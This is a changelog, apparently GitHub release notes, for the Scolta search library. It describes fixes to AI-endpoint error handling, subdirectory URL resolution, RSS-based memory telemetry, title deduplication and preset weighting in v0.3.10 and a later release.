  • AI endpoints return HTTP 200 with empty data instead of 503 when no API key is configured. A new ApiKeyMissingException is thrown by AiClient when no API key is set. AiEndpointHandler catches it specifically — before the generic exception handler — and returns a graceful empty response: handleSummarize returns {} (no summary shown), handleExpandQuery returns the original query (no expansion), and handleFollowUp returns an empty response. Sites without AI configured no longer produce 503 console errors on every search. The scolta.js fetch catch blocks also now suppress TypeError (network unreachable / offline) silently rather than logging a warning or showing an error state, so search works normally when the AI endpoint is unreachable. (#50)
  • Tests added for CATEGORY and VARIETY rules in the summarize prompt template, and for {SITE_NAME} placeholder presence in all three templates. Both CMS adapters delegate to DefaultPrompts::getTemplate() at runtime; these tests lock in the template contracts so prompt drift is caught immediately if the canonical text is removed or emptied. (#49)
  • scolta.js result links no longer double the path on subdirectory installs. Result display URLs now prefer data.meta?.url (the verbatim URL stored in data-pagefind-meta by the binary indexer) over Pagefind's resolved data.url. Pagefind's JS client resolves stored root-relative paths against the pagefind base directory when building data.url, which on a subdirectory install (/drupal/web/) produces paths like /drupal/web/sites/default/files/scolta-pagefind/drupal/web/node/42. Using data.meta?.url avoids this resolution entirely; resolveUrl(data.url) is kept as the fallback for the PHP indexer path where data.meta.url is undefined. (scolta-drupal#40)
  • IndexBuildOrchestrator::build() now returns error: 'memory_abort' when MemoryTelemetry fires. The catch block detects RuntimeException messages containing "exceeds safe threshold" and returns a structured StatusReport with error: 'memory_abort', the number of chunks already committed, and the committed page count from the build manifest. Framework adapters can now programmatically distinguish a memory abort from other failures and spawn a fresh --resume process automatically.
  • Memory telemetry now measures actual RSS instead of PHP's allocator-reported memory. MemoryTelemetry reads VmRSS and VmHWM from /proc/self/status on Linux, falling back to memory_get_usage(true) / memory_get_peak_usage(true) when /proc is unavailable (macOS, Windows). Also reads cgroup v2/v1 memory limits (/sys/fs/cgroup/memory.max, /sys/fs/cgroup/memory/memory.limit_in_bytes) to determine the effective ceiling — on containerised/shared hosting the cgroup limit is often lower than memory_limit, and either one can SIGKILL the process. The 90% abort threshold and the heap-full guard in IndexBuildOrchestrator now use actual RSS against the effective limit. StatusReport.peakMemoryBytes now reports the RSS high-water mark (VmHWM) rather than PHP's monotonic memory_get_peak_usage(true).
  • **IndexBuildOrchestrator tail chun...
Read more

v0.3.10

05 May 19:43
1555c7a

Choose a tag to compare

Fixed

  • WASM merge URL lookup now handles normalized URL formatsmerge_results in WASM may normalize URLs (strip .html, trailing slash, lowercase) before deduplication, causing the JS result-data lookup to miss and fall back to a stub object. The data map now indexes each result under four key variants (raw, normalized, slash-stripped, both) and falls through them in order; misses are logged as [scolta:merge] WASM URL lookup missed.
  • Title deduplication threshold lowered to 0.6 Jaccard — the 0.7 threshold was too permissive for short titles and multi-word proper nouns. Threshold is now 0.6, with an additional secondary condition: any pair sharing ≥3 words where the intersection covers ≥60% of the shorter title is also considered duplicate.
  • AI Overview headings now render as HTML#, ##, and ### markdown headings in AI summaries were falling through to <p> tags and displaying as raw # text. formatSummary() now maps them to <h3>/<h4>/<h5> elements.
  • AI summary now describes post-expansion resultssummarizeResults() was firing in parallel with the expansion merge, so the AI described the Phase 1 literal-keyword ranking while the displayed results showed the semantically-reordered Phase 2 ranking. Summarization is now deferred until after mergeExpandedSearchResults() completes. A searchVersion staleness check prevents summarizing results from a superseded search.
  • Relative URLs from pagefind index are absolutized before useContentItem normalizes stored URLs to relative paths for portability, but the JS needs absolute URLs in two places: the summarize API call (so the AI can include working links in the overview text) and result card <a> href attributes. Both now prepend window.location.origin when the URL starts with /.
  • ContentItem normalizes absolute URLs to relative paths — the pagefind index stores URLs verbatim into the binary .pf_fragment files at build time. When a DDEV local URL (https://myapp.ddev.site/path) was passed as ContentItem::$url, that domain was baked into the index and served as the click-through URL on the hosted demo. The constructor now strips scheme and host from any URL that contains ://, leaving only the path (and optional query/fragment). Relative URLs pass through unchanged. All platform adapters benefit automatically; no code changes needed in Drupal, WordPress, or Laravel integrations. Existing indexes must be rebuilt to get correct relative URLs.
  • stripHtml() now decodes HTML entities — the previous regex-only implementation stripped tags but left entities like &#8217; intact. escapeHtml() then double-encoded the &, causing titles and excerpts with curly quotes or other encoded characters to display as literal entity strings (e.g. Houston, We&#8217;ve Had a Problem). stripHtml() now uses DOM parsing (innerHTML/textContent) to both strip tags and decode entities in one pass.

Added

  • ContentItem::$filters and PagefindHtmlBuilder extra-filter support — a new optional filters: array<string, string> parameter on ContentItem lets platform adapters attach arbitrary Pagefind filter attributes (e.g. ['base_topic' => 'Cardiology']) that bypass HtmlCleaner and are emitted directly as <span data-pagefind-filter="key:value" hidden> elements in the exported HTML. InvertedIndexBuilder merges these into the page's filters map so the PHP indexer path also exposes them. Use case: topic-family deduplication, faceted navigation, or any per-document filter that should not be derived from body text.

Changed

  • content_catalog preset gains expand_primary_weight: 0.9 — validation testing showed that intent-based queries ("something about space") return zero raw pagefind results because stop words dominate the query. The AI expands to useful terms ("astronomy, celestial bodies") but at the old weight (default 0.5) those expanded results were diluted by the empty primary set. 0.9 gives AI-expanded results nearly equal weight to primary results, recovering the intent-based query path. Raised from implicit default (0.5) to 0.9.
  • ecommerce preset expand_primary_weight raised to 0.8 — validation testing showed that natural-language product queries ("sparkly blue gift") succeed with AI expansion but the 0.7 weight left expanded results slightly under-weighted. 0.8 brings better balance for informal shopping queries without sacrificing precision for specific product name queries. Raised from 0.7 to 0.8.